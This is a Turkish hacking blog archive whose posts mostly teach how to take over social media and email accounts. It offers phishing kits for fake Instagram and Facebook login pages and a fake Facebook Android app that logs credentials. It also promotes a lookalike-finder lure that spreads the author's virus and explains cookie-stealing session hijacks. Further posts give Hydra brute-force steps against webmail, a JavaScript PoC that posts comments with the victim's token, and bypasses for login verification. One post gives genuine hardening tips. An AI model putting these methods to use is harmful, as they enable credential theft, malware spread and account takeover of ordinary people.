KAPTANWHİTEHAT HOŞ GELDİNİZ! !

Blogumuza Hoş Geldiniz Keyifli Zaman Geçirmek Dileğiyle. http://kaptanwhitehat.blogspot.com.tr/.

KAPTANWHİTEHAT Fame Store ile sende fame ol!!

KAPTANWHİTEHAT Hack Fame Store ile bir çok sosyal paylaşım sitesinde fame olabilirsin! www.KAPTANWHİTEHAT.blogspot.com.tr.

KAPTANWHİTEHAT hackerlar'dan korunma yolları!

Bi hacker saldırısına korunma yollarını blogdaki konuları takip ederek öğrenebilirsiniz. www.KAPTANWHİTEHAT.blogspot.com.tr.

KAPTANWHİTEHAT programcı olmak istermisiniz

Programlama kategorisini takip ederek programcı olabilirsiniz. www.KAPTANWHİTEHAT.blogspot.com.tr.

En Güncel Paylaşımlar KAPTANWHİTEHAT'da !

En güncel Hack Paylaşımlar blog sayfamızdan ulaşabilir araştırabilirisiniz. www.KAPTANWHİTEHAT.blogspot.com.tr.

Sosyal Medya Güvenlik Açıkları etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Sosyal Medya Güvenlik Açıkları etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

26 Mayıs 2015 Salı

Sosyal Dork

Google Arama Motoruna Alltaki Dorkları Yazarak Email ,Yahoo , CC ,Facebook , V.b Bütün Sosyal Ağaların Şifrelere Ulaşabilirsiniz

####Google Dork#####

Program:firefox Url/Host:http://www.yahoo.com login

Program:firefox Url/Host:http://www.facebook.com login

25 Mayıs 2015 Pazartesi

Kolay Facebook Şifre ve Mail Öğrenmek !

Anlatım alıntı değildir.
Bu yöntem ile oturduğunuz yerden öğrenme gibi bir konu söz konusu değil.
Gerekli olan android işletim sistemli bir cihaz. Android sürümü 4.0.4 den düşük olmamasını öneriyorum. Vereceğim uygulamanın 4.0.4 ün altında çalışıp çalışmadığını denemedim. Uygulama Google Playde yok. Buyrun APK Linki:

İNDİR

Çalışma mantığı oldukça basit. Uygulama tıpkı facebook gibi gözüküyor.





Email ve şifrenizi yazıp login dediğinizde uygulama her halükarda "not connection" hatası verecek. Bu gerçek bir hata değil. Kurbanın email ve şifresi telefon hafızasında file.txt isimli bir not defteri açılıp kaydedildi.



Dosya yöneticiniz ile girerek şifreye ve emaile ulaşabilirsiniz.

Sosyal mühendislik kısmı burdan sonra başlıyor. Kurbanın yanına gidip "faceni girsene" dersek direk çuvallarız(tabi karşıdaki dalgın veya kankanız değilse). Küçük yalanlar la karşıdakini kandırmalısınız.

Sizin yöntemlerinizi de yorumda görelim. 

Ha oldu da işinize yaradıysa +replerinizi almaya hazırım 

24 Mayıs 2015 Pazar

Facebook v4.0 API - Uygulama oluşturma



Facebookta istediğiniz uygulamayı oluşturabilirsiniz iyi seyirler..

23 Mayıs 2015 Cumartesi

Fake İnstagram Script 2015 - Kolay Yoldan Hesap Çalma



Nedir bu Fake dersek, İnstagram giriş yapma sayfasının aynısı olan bir site oluştururuz ve çeşitli senaryolarla mesela şu caps'e bir baksana diğerek hedefe link gönderilir. Kurban da önce giriş yapacağını sanarak bizim sahte sitemizden giriş yapar ve bilgileri bize gelir. Ardından sitemiz onu komik caps'e yönlendirir ve kurbanın ruhu bile duymaz.
Kısacası bu yöntem lügatta 'phising' olarak geçer. Birçok hosting phising scriptleri olduğu zaman bunları hemen tespit eder ve siteyi açtıktan en fazla 2 gün sonra ekranda kocaman 'ACCOUNT SUSPENDED' yazısını görürsünüz.
Üzülmeyin, 20 dk boyunca keriz bir hosting araştırdım ve buldum. Bırakın phising'i tespit etmeyi, sitenize shell atsanız ruhu bile duymuyor Ayrıca benim kullandığım script genç daha, 2015 model.
Anlamadığınız kısmı yorum atarak sorabilirsiniz. Her konumda yaptığım gibi burda da kısaca adımları özetleyelim;
  • 0fees.net'ten Free Domain Hosting Alınır
  • Filezilla Yardımıyla FTP'den Script sitemize atılır
  • Link kısaltılarak sitemiz çeşitli sen
  • aryolara gönderilir "hesapp.txt" gelir ve kurbanın hesabı ele geçirilir
Merhaba sabırsızlar İşte linkler:

DEMO

İndir

VİRÜS TOTAL

NOT : SORUMLULUK KULLANICIYA AİTTİR KAPTAN WHİTE HAT SORUMLUSU DEĞİLDİR ! 

Facebook Lite İle Bedava Facebook[Turkcell]

             
Facebook`a internet veya facebook paketiniz olmadan girmek için aşşagidaki adimlar uygulayabilirsiniz.

Not:Sadece Turkcellde çalisir tamamen bedava ve sinirsiz.

• Menü tuşuna basarak menüden “Ayarlar” bölümüne girin.
• Ayarlar bölümünde “Mobil Şebeke” seçeneğini etkin hale getirin ve tekrar tıklayarak “Mobil Şebeke Ayarları”na girin
• “Erişim Noktası adları”na tıklayın.
• Erişim Noktası Adlarında sağ üst tarafta “Menü” bölümüne basın ve “Yeni Apn”i seçin.
• Açılan ekranda gelen seçenekleri aşağıda verilen bilgileri girerek doldurun ve geri tuşuna basarak kaydedin.
Ad: hackvemantik
APN: internet
Proxy: 127.0.0.1
Bağlantı Noktası: 8080

Son Olarak Faceboook lite Uygulamasini İndirerek Facebookun Tadini Çikartabilirsiniz.
                                 
                         Facebook lite apk

21 Mayıs 2015 Perşembe

Facebook Benzerimi Bul Virüs Yayma Fakesi (Yoğun İstek üzerine Bedava...)



Özellikleri
>Uygulama kullanılırken fake yorumlar eklenmeye devam eder.
>5 sayfalık önceden eklenmiş yorum bulunmaktadır.
>Uygulama başlatıldıktan sonra bulunan sonuçlar benzerlik yüzdesi ve şehir şeklinde sıralanır.
>Son aşamada ise facebook Photo Opener eklentisini yüklemeden Bulunan sonuçlardaki fotoğrafları görüntülenemeyceğini Download Btonundan uygulamayı indirebileceğinizi bildiren hata sayfası görüntülenir.
>İndirilen uygulama bizim virüsümüz olacaktır.

Ekran Görüntüleri
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Sadece Facebook Profilimde yaptığım paylaşımdan sonra botnetimden aldığım ekran görüntüsü
Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


TIKLA İNDİR

Twitter Session Hijack/Ordu-yu Lojistik-2



Selamun Aleyküm kardeşlerim,abilerim




Bugün sizleri Twitter’da mevcut bulunan Session Hijack açığından bahsedeceğim.

Bu açığı nasıl kullanabiliriz?

Bu açığı topluma açık olan ağlarda veya local ağınızda olan kişilerin paketlerini dinleyerek kullanabilirsiniz.

Ağımızda olmayan kişiler için tek başına bu açık bir işe yaramaz arkadaşlar hedefteki şahsın cookie bilgilerini çalmanız lazım.Peki bunu nasıl yapacağız diye soruyorsanız ilk önce kendi hostunuza Cookie sniffer kurmalısınız sonrada Twitter’da yeni bir açık aramanız gerek bu açığın genel ismi XSS dir.

Efendim neden Xss açığı bulmak zorundayız direk hostumuzun linkini atarız sazan avını başlatırız diyenler olabilir Twitter bunada bir güvenlik geliştirmiş attığınız her url’yi t.co uzantısıyla yönlendirirken cookieleriniz pirupak şekilde siliniyor bunun için hedefi xss bulduğunuz url ile yönlendirmeniz gerekiyor.

Bu açığı anlatırmısın?

Arkadaşlar bunu video yardımıyla anlatacağım videoda hafif aksaklıklar oldu kusura bakmayın..

Cookie’sini çaldığımız kişinin auth_token ve twimg değerinde bulunan userid’i değiştirerek kişinin hesap ayarlarına erişebilirsiniz telefon ekleyip telinize gelen kod aracılığıyla hesaba tamamen hükmedebilir yada şifreyi değiştirmeden twit atabilirsiniz.

Kişinin twitter kullanıcı id için Link

Bilgilerinden yararlandığım Emrullah Akdemir ve Loading abilerime teşekkür ederim...

Video Link 1    

Video Link 2Link 

Hotmail/Gmail/Yahoo BruteForce

Selamun Aleyküm CW Ailesi

Direk konuya girelim arkadaşlar bu gün size Hydra aracı ile Hotmail/Gmail/Yahoo hesaplarını kırma mantığını göstereceğim.


Terminali açıp sh -c "xhydra" komutu ile hydra aracının arayüzlü versiyonunu çalıştırıyoruz.

Applications-->BackTrack-->Privilige Escalation-->Password Attacks-->Online Attacks-->hydra-gtk



Evet aracımız açıldı farkketdiyseniz sağ altta her düzenlemenin kod hali var bunuda hatırlatayım.

Evet ana mantığı anlatacağım

hotmail
server: smtp.live.com
port: 587

gmail
server: smtp.gmail.com
port: 465

yahoo
server: smtp.mail.yahoo
port:587




Evet değiştireceğimiz yerler Single Target’ı hotmail,gmail,yahoo hedef hangisinde ise onu yazıcağız.Biz burada hotmaili seçtik smtp.live.com

İkinci olarak port: 587

Üçüncü olarak protocol: smtp

Dördüncü olarak alttaki Be Verbose ve Show Attempts kutucuklarına tıklıyoruz.

Şimdi ikinci adım



Burada Username hedef adresi Password List’e wordlistimizi birde aşağıdaki Try login as password butonuna tıklayacağız.



Evet Start sekmesine gelip direk sol alttaki start butonuna tıklıyoruz ve şovu izliyoruz.

Arkadaşlar ben örnek olarak hotmail hesabı kırmayı anlattım...
Emeğe saygı... Selametle...

11 Mayıs 2015 Pazartesi

FACEBOOK COMMENT'S PİCTURE HAKİNG

-----Javascript Facebook Picture Hijack PoC----

var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack

function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = --;
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt©
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=-)[1].split(-;-)[0],
h = "ft_ent_identifier=-+statuslinkID+-&comment_text=-+yourMessage +-&source=1&client_id=1371674471412:1000847939&attached_photo_fbid=-+photofbID+-&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=- + c + -&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=- + e;
m = generatePhstamp(h, e);
h += -&phstamp=- + m;
picture = new XMLHttpRequest();
picture.open("POST", "https://www.facebook.com/ajax/ufi/add_comment.php", true);
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted at http://facebook.com/-+statuslinkID);



Video

8 Mayıs 2015 Cuma

Facebook'da Gizlenen Arkadaş Listesini Görmek

Selam arkadaşlar yeni çıkan Chrome eklentisi sayesinde başkasının gizlenmiş arkadaş listesini görebilirsiniz.

Bunun için lazım olanlar:

  • Google Chrome
  • 'Friends Mapper' eklentisi
1. Chrome'a Webstore'dan 'Friends Mapper' eklentisini indiriyoruz

2. Bir arkadasimizi seciyoruz, 'ortak arkadaslar' yazan yerin yaninda eklenti sayesinde "Reveal Friends" yazar. 


3. 'Reveal Friends" yazan yere tikliyoruz

ve liste karsimizda

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


NOT: Bu islemin gerceklesmesi icin kurban ile sizin en az bir tane ortak arkadasin bulunmasi gerekir, kurban ile arkadas olmaniz gerekmez

10 Nisan 2015 Cuma

Facebook Gizli Soru Deneme Sınırını Aşma

Facebook Gizli Soru Deneme Sınırını Aşma
İlk olarak Facebook'a giriyoruz fakat giriş yapmıyoruz.

Şifremi Unuttum dizinine tıklayıp,kullanıcı adını giriyoruz.
Çıkan ekranda bir şeye tıklamayıp altdaki [Bunlara Artık Erişimin Yok mu?] tıklıyoruz.
Yani buraya kadar biliyorsunuz,ama devamını resimlerle izleyin..


İlk olarak bir kez yanlış giriyoruz.

Boş kutuya sağ tıklayıp ÖGEYİ DENETLE diyoruz.


Mavi ile işaretli olan dizini bulun ve kırmızı ok ile işaretlediğim yere iki kere tıklayın. 


Sonra yine ok işaretli noktalı yere iki defa tıklıyoruz. 


Daha sonra buraya da iki kez tıklayarak, noktalı olan kısma HACK yazın.


Gördüğünüz gibi yanlış girme uyarısı geldi,fakat bundan sonra devam edemezdiniz normalde. 
Deneyin ve kaç kere girebiliyorsanız sayın. 

İşin püf noktası,karşınıza çıkan noktalı yerlere iki kez tıklamak ve en sondakine HACK yazmak. 
Bu adımları atlamak için elinizin bu dizinlere alışması lazım. 
Çünkü en küçük ayrıntıda hata yapabilirsiniz.

9 Nisan 2015 Perşembe

Hotmail/Outlook Unauthorized Login Bypass Verifcation!






Bypassing Steps;

1- Open Settings From Your iPhone

[ http://i.imgur.com/wx8KkeY.jpg ]
2- Go To Your "Mail/Contacts/Calendar" Tab

[ http://i.imgur.com/rT07UBy.png ]



3- Add A New Account

[ http://i.imgur.com/Wl8FTnc.png ]



4- Select "OUTLOOK"

[ http://i.imgur.com/xRVgtNq.png ]



5- Add Your Target & Hit Next!

[ http://i.imgur.com/AqBGJMZ.png ]



6- You will have his inbox, look for the last message

   And click on the button sent to you to give yourself

   The Permission to login from your computer !

[ http://i.imgur.com/gVzVCkw.png ]



7- Congratulations ! :D You're in!

   Login from PC Normaly , no verification required!



Dont try this with gmail,its secured i tried ;)

1 Nisan 2015 Çarşamba

Facebook Güvenliğinizi %100'e Çıkarın

Merhabalar , Ben byfehmi Bu Makalede Sizlere Facebook Hesabımızı Nasıl Güvenli Olmasını Sağlarız Sorusuna Cevap Veriyorum ..
Telefon Ile Güvenlik;
- Kodmatiği etkinleştirerek hesabınızın şifresini bilseler de hesaba giriş yapamamalarını sağlayabilirsiniz.


E-posta ile Güvenlik;
- E-posta olarak gmail kullanmaya özen gösterin. Kullandığınız gmail adresinin güvenliği için telefonla giriş onayı ve hesabınıza yedek e-posta ekleyin.


Giriş bildirimleri;
- Ayarlar > Güvenlik > Giriş Bildirimleri - Bu kısımdan e-posta ve Kısa mesajı seçin.
Böylece başka bi yerden giriş yapılmaya çalıştıklarında bildirim alacaksınız. [IP ve Konum ile birlikte]


Güvenilir kişiler;
- Hesabınıza güvendiğiniz, zor bir durumda yardım alacağınız 3 veya 5 kişi ekleyin.
Böylece olası bir durumda onların yardımını kullanarak şifrenizi sıfırlayabilirsiniz.


Giriş Onayları;
- Giriş onaylarını kesinlikle aktifleştiriniz. Böylece farklı bir tarayıcıdan giriş yapılamayacak ve telefonunuza kod gelecektir.


Güvenilir Tarayıcılar;
- Kayıtlı tarayıcıların size ait olduğundan emin olun. Bilmediğiniz tarayıcıları kaldırın.


Giriş Yapılan Yerler;
- Hesabınıza nerden giriş yapıldığını detaylı olarak IP adresiyle birlikte bulabilirsiniz.

Facebook Telefon Güvenlik Kodunu Geçme

SİTE  ile sitelerdeki telefon doğrulama işlemini fake bir telefon numarası girerek yapabilirsiniz.
İlk olarak pinger.com'a gelip "Textfree Web"e tıklıyoruz.Ardından "sign up FREE" yazısına tıklayıp siteye kayıt oluyoruz.Kayıt sırasında posta kodu soracaktır.Herhangi bir yerin posta kodunu girebilirsiniz.
Kayıt olduktan sonra tel numarası seçmeniz için bir ekran gelecektir.Burada seçeceğimiz numarayı sitelerde telefon doğrulama için kullanacağız.


Sms almamız için gereken fake telefon numarası hazır.Şimdi sisteminin çalışıp çalışmadığını görmek için Facebook'ta telefon doğrulama yapalım.
Telefon numarası kısmına pinger.com'dan aldığımız numarayı girip "Devam"a tıklıyoruz.



Pinger.com sitesine döndüğümüzde onay kodunun geldiğini göreceğiz.



Gelen onay kodunu girip "Onayla" ya tıklıyoruz.

Resimde gördüğünüz gibi telefon numaramız doğrulanacaktır.

5 Mart 2015 Perşembe

1 Mart 2015 Pazar

Fake Facebook Tokenli Beğeni Scripti V1



İndir

Fake Facebook Tokenli Beğeni Scripti V1


Evet arkadaşlar sizlere yeni bir script paylaşıyorum.Bu script ile facebook kullanıcılarının tokenlerini çalabileceksiniz.Ve bu script ile siz mysql bağlantı kurmakla ve phpmyadmin'e .sql dosyalarını okutmaya gerek kalmadan hostunuza atabileceksiniz.Direk hostunuza attığınızda scriptinizi kullanmaya rahatlıkla başlayabilirsiniz.Fazla konuşmayalım scripti anlatmaya geçelim.


Evet arkadaşlar scriptin mantığı şu.Karşı tarafa siteyi attığınızda site açılınca karşısına üç seçenek çıkıcak.Birine tıkladığında token almasını isticek.Tokeni alıp ordaki kutucuğa yapıştırıcak.Daha sonra token txt dosyalarına gelicek ve kişiyi çalışan bir tokenli beğeni sitesine yönlendiricek.Tekrar tokenini girerse kişi istediğini beğendirmiş olucak ve bu arada siz tokeni almış olucaksınız.


Anlatım:
Arkadaşlar dosyaları direk hostunuza atın.Girilen tokenler .txt dosyalarına gelicek.Filezilla ile hostunuzu açıp ordan tokenlere bakabilirsiniz.İyi kullanımlar

Fake Facebook Final Sürüm

Kurulumu burada yapmıyacağım içlerine ufak ufak notlar yazdım.Ama yapamayanlar için video çekicek arkadaşlar varsa bana video upload edip özel mesaj atsınlar konuya koyarım.

Scriptin İçindekiler:
Hatasız Loglu Fake Facebook,
Hatalı Loglu Fake Facebook,
Mailli Hatalı Fake Facebook,
Mailli Hatasız Fake Facebook

İndir
Virüs Total